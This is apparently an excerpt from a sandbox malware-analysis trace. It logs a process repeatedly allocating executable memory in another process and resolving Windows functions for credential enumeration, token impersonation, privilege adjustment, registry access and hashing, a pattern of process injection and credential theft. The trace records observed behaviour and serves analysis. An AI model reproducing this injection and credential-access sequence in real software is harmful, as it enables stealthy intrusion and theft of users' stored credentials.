	[0197.956] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.956] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.957] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.957] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.957] lstrlenA (lpString="GetACP") returned 6
	[0197.957] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.958] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.958] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.959] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.959] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.959] lstrlenA (lpString="SetFilePointerEx") returned 16
	[0197.959] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.959] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.960] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.960] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.960] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.960] lstrlenA (lpString="GetTimeZoneInformation") returned 22
	[0197.960] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x17, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.961] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.961] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.962] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.962] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.962] lstrlenA (lpString="FindClose") returned 9
	[0197.962] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.962] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.963] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.963] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.963] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.963] lstrlenA (lpString="FindFirstFileExA") returned 16
	[0197.963] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.964] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.964] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.964] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.965] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0197.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30bc2f6, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11
	[0197.965] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307d98
	[0197.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30bc2f6, cbMultiByte=-1, lpWideCharStr=0x2307d98, cchWideChar=11 | out: lpWideCharStr="USER32.dll") returned 11
	[0197.965] lstrlenW (lpString="USER32.dll") returned 10
	[0197.965] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.966] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.978] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x1284f8*=0x70) returned 1
	[0197.978] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.978] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.978] lstrlenA (lpString="IsCharAlphaNumericW") returned 19
	[0197.978] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.979] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.979] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.980] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.980] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.980] lstrlenA (lpString="wsprintfA") returned 9
	[0197.980] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.981] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.981] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.981] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.981] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0197.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30bc45e, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13
	[0197.981] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307d98
	[0197.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30bc45e, cbMultiByte=-1, lpWideCharStr=0x2307d98, cchWideChar=13 | out: lpWideCharStr="ADVAPI32.dll") returned 13
	[0197.981] lstrlenW (lpString="ADVAPI32.dll") returned 12
	[0197.982] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.982] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.983] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x1284f8*=0x70) returned 1
	[0197.984] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.984] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.984] lstrlenA (lpString="CryptGenRandom") returned 14
	[0197.984] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.984] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.985] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.985] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.985] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.985] lstrlenA (lpString="GetTokenInformation") returned 19
	[0197.985] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.986] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.986] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.987] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.987] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.987] lstrlenA (lpString="ConvertSidToStringSidW") returned 22
	[0197.987] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x17, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.987] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.988] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.988] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.988] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.988] lstrlenA (lpString="OpenProcessToken") returned 16
	[0197.988] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.989] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.989] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.990] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.990] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.990] lstrlenA (lpString="ImpersonateLoggedOnUser") returned 23
	[0197.990] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.990] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.991] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.991] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.991] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.991] lstrlenA (lpString="GetUserNameA") returned 12
	[0197.991] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.992] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.992] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.993] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.993] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.993] lstrlenA (lpString="LookupPrivilegeValueA") returned 21
	[0197.993] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.993] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.994] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.994] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.994] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.994] lstrlenA (lpString="RegDisablePredefinedCacheEx") returned 27
	[0197.994] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.995] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.995] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.995] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.996] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.996] lstrlenA (lpString="AdjustTokenPrivileges") returned 21
	[0197.996] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.996] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.997] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.997] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.997] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.997] lstrlenA (lpString="RegEnumKeyExA") returned 13
	[0197.997] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.998] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.998] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.999] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.999] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.999] lstrlenA (lpString="RegOpenKeyExA") returned 13
	[0197.999] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.999] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.000] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0198.000] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.000] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.000] lstrlenA (lpString="IsTextUnicode") returned 13
	[0198.000] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.001] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.001] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0198.002] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.002] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.002] lstrlenA (lpString="CredEnumerateA") returned 14
	[0198.002] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.002] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.003] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0198.003] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.003] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.003] lstrlenA (lpString="DuplicateToken") returned 14
	[0198.003] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.004] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.004] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0198.004] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.005] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.005] lstrlenA (lpString="RegEnumKeyA") returned 11
	[0198.005] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.005] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.005] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0198.006] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.006] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.006] lstrlenA (lpString="RegOpenKeyA") returned 11
	[0198.006] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.007] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.043] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0198.043] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.043] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.043] lstrlenA (lpString="RegQueryValueExA") returned 16
	[0198.043] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.044] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.044] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0198.045] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.045] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.045] lstrlenA (lpString="RegCloseKey") returned 11
	[0198.045] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.045] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.046] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0198.046] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.046] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.046] lstrlenA (lpString="CryptAcquireContextW") returned 20
	[0198.046] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.047] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.047] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0198.047] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.048] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.048] lstrlenA (lpString="CredEnumerateW") returned 14
	[0198.048] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.048] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.048] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0198.049] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.049] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.049] lstrlenA (lpString="CredFree") returned 8
	[0198.049] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.050] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.050] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0198.050] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.051] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.051] lstrlenA (lpString="CryptCreateHash") returned 15
	[0198.051] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.051] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.051] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0198.052] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.052] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.052] lstrlenA (lpString="CryptHashData") returned 13
	[0198.052] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.053] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.053] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0198.053] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.053] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.053] lstrlenA (lpString="CryptDestroyHash") returned 16
	[0198.054] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.054] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.054] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0198.055] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.055] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.055] lstrlenA (lpString="RegOpenKeyExW") returned 13
	[0198.055] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0198.056] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0198.056] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0198.056] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.056] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0198.056] lstrlenA (lpString="CryptGetHashParam") returned 17
	[0198.056] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
